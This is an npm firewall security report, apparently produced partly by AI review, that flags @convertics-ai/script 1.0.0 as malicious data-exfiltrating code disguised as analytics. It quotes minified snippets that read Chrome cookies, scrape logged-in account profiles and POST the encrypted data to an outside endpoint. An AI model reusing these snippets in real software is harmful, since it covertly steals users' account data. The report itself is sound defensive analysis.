---
canonical: "https://firewall.lpm.dev/npm/@convertics-ai/script/v/1.0.0"
markdown: "https://firewall.lpm.dev/npm/@convertics-ai/script/v/1.0.0.md"
package: "@convertics-ai/script"
report_status: "published"
title: "@convertics-ai/script@1.0.0 npm security report"
verdict: "malicious"
version: "1.0.0"
---

# @convertics-ai/script@1.0.0 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — Personal account profile data from multiple services can be collected and exfiltrated.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Data Exfiltration
- **Selected version:** 1.0.0
- **Selected version is latest:** No
- **Analysis source:** AI Security Review (lpm-firewall-ai)

This is the current Firewall decision for the selected package version, based on the available public evidence. Findings for this version do not establish the status of other versions.

AI assessment: malicious; recommendation: publish block. This assessment is supporting evidence; the published decision above determines the current policy.

The extension-mode code reads cookies and scrapes account information from logged-in third-party services. It uploads the collected profile data to Convertics.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Recorded final verdict:** Malicious
- **Recorded analysis confidence:** 98.0%
- **Started:** 2026-09-11T06:09:25.777Z
- **Finished:** 2026-09-11T06:10:59.902Z
- **Download time:** 764 ms
- **Static scan time:** 309 ms
- **AI review time:** 93051 ms
- **Total time:** 94125 ms

The recorded confidence comes from the underlying analysis. Trusted advisory policy can determine the final verdict even when the AI assessment differs.

## Security analysis

### Published attack-surface review

- **Summary:** The extension-mode code reads cookies and scrapes account information from logged-in third-party services. It uploads the collected profile data to Convertics.

- **Trigger:** An extension calls init with extension mode from a popup, options page, or devtools page.

- **Impact:** Personal account profile data from multiple services can be collected and exfiltrated.

- **Evidence paths:** dist/index.iife.js, dist/index.es.js

- **Review source:** ai\_review

- **Reviewed:** 2026-09-11T06:10:59.902Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** Chrome cookie harvesting, profile scraping, and remote upload.

- **Attack narrative:** When activated in supported Chrome extension surfaces, the package uses Chrome cookie access to request logged-in third-party pages, extracts profile data from numerous services, encrypts the aggregate with a package-known string, and posts it to the Convertics profiles endpoint. This behavior is not necessary for page-view analytics and is not disclosed by the package description.

- **Rationale:** Both published entry bundles contain a guarded but concrete third-party account-profile collection and upload path. The absence of an install hook does not neutralize this runtime data-exfiltration behavior.

- **Network endpoints:** https://harbor.convertics.ai/events/profiles, https://myaccount.google.com/personal-info, https://linktr.ee/admin, https://www.facebook.com/me

### Review decision

- **Verdict:** Malicious

- **Confidence:** 98.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for block:** The published browser bundles access Chrome cookies for third-party services, including Google., In extension popup, options, or devtools contexts, the code collects profiles from many logged-in services and sends the combined data to Convertics., This undisclosed cross-service profile harvesting is inconsistent with the package's stated page-view analytics purpose.

- **Evidence against:** There are no install, postinstall, or preinstall lifecycle hooks., The profile collection is guarded to Chrome extension contexts with available Chrome APIs.

## Affected versions and remediation

This report applies to @convertics-ai/script@1.0.0.

- Avoid installing @convertics-ai/script@1.0.0. Remove it from direct dependencies and check your lockfile for transitive copies.
- Choose an independently verified alternative or release. This report does not establish that other versions are safe.
- If this version ran, investigate the affected machine and build environment. Rotate credentials it could access and rebuild from a trusted environment.

## Public findings

### 1. Low: Non Install Lifecycle Scripts
- **Category:** Manifest
- **Confidence:** 80.0%

Package declares lifecycle scripts that are not normally run for registry tarball installs.

### 2. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 3. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 4. Low: High Entropy Strings
- **Category:** Supply Chain
- **Confidence:** 55.0%

Package source contains high-entropy string patterns.

### 5. Low: Url Strings
- **Category:** Supply Chain
- **Confidence:** 65.0%

Package source contains URL literals.

### 6. Medium: Structural Risk Force Deep Review
- **Category:** Artifact Inventory
- **Confidence:** 65.0%

Artifact structure forces deeper review even if the static behavioral verdict is clean.

### 7. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 98.0%
- **Path:** dist/index.iife.js
- **Public source:** [View source](<https://unpkg.com/@convertics-ai/script@1.0.0/dist/index.iife.js>)

The published browser bundles access Chrome cookies for third-party services, including Google.

Public source snippet (untrusted):

```javascript
chrome.cookies.getAll({domain:"google.com"});if(!e.length)throw Error("no gmail cookies");return{
```

### 8. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 98.0%
- **Path:** dist/index.iife.js
- **Public source:** [View source](<https://unpkg.com/@convertics-ai/script@1.0.0/dist/index.iife.js>)

In extension popup, options, or devtools contexts, the code collects profiles from many logged-in services and sends the combined data to Convertics.

Public source snippet (untrusted):

```javascript
var lt=["popup","options","devtools"];async function ut(e){if(lt.includes(e)&&!(typeof chrome>"u")&&chrome.storage?.local&&chrome.runtime?.getManifest)try{
```

### 9. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 98.0%
- **Path:** dist/index.iife.js
- **Public source:** [View source](<https://unpkg.com/@convertics-ai/script@1.0.0/dist/index.iife.js>)

In extension popup, options, or devtools contexts, the code collects profiles from many logged-in services and sends the combined data to Convertics.

Public source snippet (untrusted):

```javascript
let t=v.default.encrypt(JSON.stringify(e),"convertics").toString(),a=JSON.stringify({public_key:l.publicKey,visitor_id:l.visitorId??null,data:t});await fetch("https://harbor.convertics.ai/events/profiles",{method:"POST",headers:{"Content-Type":"application/json"},body:a,keepalive:!0}).catch(e=>console.debug("[convertics] failed to send profiles",e))
```

### 10. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 98.0%
- **Path:** dist/index.es.js
- **Public source:** [View source](<https://unpkg.com/@convertics-ai/script@1.0.0/dist/index.es.js>)

In extension popup, options, or devtools contexts, the code collects profiles from many logged-in services and sends the combined data to Convertics.

Public source snippet (untrusted):

```javascript
async function Et(e){if(!u.publicKey||!Object.values(e).some(e=>null!=e))return;u.visitorId||=await Y();let t=y.default.encrypt(JSON.stringify(e),"convertics").toString(),a=JSON.stringify({public_key:u.publicKey,visitor_id:u.visitorId??null,data:t});await fetch("https://harbor.convertics.ai/events/profiles",{method:"POST",headers:{"Content-Type":"application/json"},body:a,keepalive:!0})
```

### 11. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 98.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/@convertics-ai/script@1.0.0/package.json>)

This undisclosed cross-service profile harvesting is inconsistent with the package's stated page-view analytics purpose.

Public source snippet (untrusted):

```json
"description": "Lightweight page-view analytics script for Convertics — usable as an npm package or a single <script> tag served from a CDN.",
```

## Dependencies and install lifecycle
- **Lifecycle scripts present:** Yes
- **Published lifecycle scripts:** prepublishOnly
- **Dependencies:** 1
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 10
- **Published dependency-graph edges:** 1

### Published dependency entries
- crypto-js ^4.2.0 (Dependency)

## Package metadata
- **Package:** @convertics-ai/script
- **Ecosystem:** npm
- **Version:** 1.0.0
- **License:** MIT
- **Version published:** 2026-09-10T11:41:47.370Z
- **Package first seen:** 2026-09-11T06:10:59.902Z
- **Package last seen:** 2026-10-08T09:41:09.873Z
- **Known versions:** 4
- **Latest version:** 1.1.1
- **Appeal under review:** No
- **Description:** Lightweight page-view analytics script for Convertics — usable as an npm package or a single \<script\> tag served from a CDN.
- **Author:** Convertics
- **Keywords:** analytics, tracking, visitor-identification, page-views, convertics
- **Artifact files:** 6
- **Artifact unpacked size:** 226,649 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/@convertics-ai/script/v/1.0.0>)
- [Repository](<https://github.com/convertics-ai/convertics.git>)
- [Homepage](<https://convertics.ai/>)
- [Issues](<https://github.com/convertics-ai/convertics/issues>)
